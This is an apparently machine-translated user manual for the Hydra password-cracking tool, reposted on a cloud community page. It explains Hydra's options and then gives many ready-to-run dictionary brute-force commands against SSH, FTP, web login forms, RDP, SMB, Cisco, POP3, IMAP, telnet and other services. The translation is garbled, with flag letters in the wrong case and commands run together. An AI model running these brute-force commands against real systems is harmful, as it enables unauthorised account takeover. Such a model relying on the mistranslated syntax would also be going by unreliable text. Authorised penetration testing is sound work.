Home > Others

Hydra User Manual

Source: Internet
Author: User
Tags imap
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Hydra

Parameters:

-R
Continue to break from last progress

-S
Uppercase with SSL link

-S <PORT>
lowercase, you can specify a nondefault port with this parameter

-L <LOGIN>
Specify cracked users, cracked for specific users

-L <FILE>
Specify a dictionary of user names

-P <PASS>
lowercase, specifying password cracking, less use, usually using a password dictionary

-P <FILE>
Uppercase, specifying the password dictionary

-E <ns>
Optional options, N: null password heuristic, s: heuristic with specified user and password

-C < file>
Use colon split format, such as "Login: Password" instead of-l/-p parameter

-M < file>
Specify the target list file one line at a

-O < file>
Specify the result output file

-F
After using the-m parameter, find the first login or password to abort the break

-T < tasks>
The number of concurrently running threads, default to 16

-W < time>
Set the maximum time to timeout, in seconds, by default is 30s

-V/-V
Show detailed procedures

Server
Destination IP

Service
Specify service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt http[s]-{head|get} http-{get|post}-form http-proxy Cisco Cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs snmp rsh CVS svn ICQ sapr 3 Ssh2 SMTP-AUTH[-NTLM] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera

Opt
Options available

Iv. examples

1, manually create the user name dictionary and password dictionary, here just to demonstrate, only a few user names and weak password. When really cracked, a powerful dictionary needs to be generated using the Cipher dictionary generator.

2. hack ssh:

# hydra-l users.txt-p password.txt-t 1-vv-e ns 192.168.1.104 SSH

Crack success, direct display results.

You can also specify the result output file using the-o option.

# hydra-l users.txt-p password.txt-t 1-vv-e ns-o save.log 192.168.1.104 ssh

V. Other types of password cracking

    • Hack ftp:
# Hydra IP ftp-l user name-p password Dictionary-t thread (default)-VV# Hydra IP ftp-l user name-p password Dictionary-e ns-vv
    • Get way to commit, hack Web login:
  # hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/  # hydra-l user name-p password Dictionary-t thread-vv-e ns-f IP http-get/a dmin/index.php
    • Post mode submission, Hack Web login:

The strength of the software is to support a variety of protocol cracking, but also support the Web user interface of the login crack, get form submitted by simple, here through the Post method to submit password cracking provide ideas. A bad thing about this tool is that if the target website is logged in, it will be impossible to hack the code. Break with parameters as follows:

<form Action="Index.php" Method="POST"><input Type="Text" Name= "name"  /><br><br><input type=  "password"  name= "pwd"  /><br><br><input< Span class= "PLN" > type= "submit"  name= "sub"  value = "submit" ></form

Assuming that you have one of these password login forms, we execute the command:

# hydra-l admin-p pass.lst-o ok.lst-t 1-f 127.0.0.1 http-post-form "Index.php:name=^user^&pwd=^pass^:<title> ;invalido</title> "

Description: Cracked username is admin, password dictionary is pass.lst, the cracked result is saved in Ok.lst,-t is the number of threads at the same time as 1,-f is when cracked a password on stop, IP is local, is the target ip,http-post-form means the hack is using HTTP Form password hack submitted by the Post method.

The following parameter is the Name property of the corresponding form field in the Web page, and the following <title> is the return information hint that represents the error guess, which can be customized.

    • Hack https:
# hydra-m/index.php-l muts-p pass.txt 10.36.16.18 HTTPS
    • Crack TeamSpeak:
# hydra-l User name-p password Dictionary-s port number-VV IP teamspeak
    • Crack Cisco:
# hydra-p Pass.txt 10.36.16.18 Cisco# hydra-m cloud-p pass.txt 10.36.16.18 cisco-enable
    • Crack SMB:
# hydra-l administrator-p pass.txt 10.36.16.18 SMB
    • Crack POP3:
# hydra-l muts-p pass.txt my.pop3.mail POP3
    • Hack RDP:
# Hydra IP rdp-l administrator-p pass.txt-v
    • Crack Http-proxy:
# hydra-l Admin-p pass.txt http-proxy://10.36.16.18
    • Hack IMAP:
# HYDRA-L USER.TXT-P Secret 10.36.16.18 IMAP PLAIN# hydra-c defaults.txt-6 imap://[fe80::2c:31ff:fe12:ac11]:14 3/plain
    • Hack telnet
# Hydra IP telnet-l user-p password dictionary-t 32-s 23-e ns-f-V

Hydra User Manual

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
nexus 7 user manual paradox user manual svn user manual workday user manual ps3 user manual ps3 user manual pdf garageband user manual

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More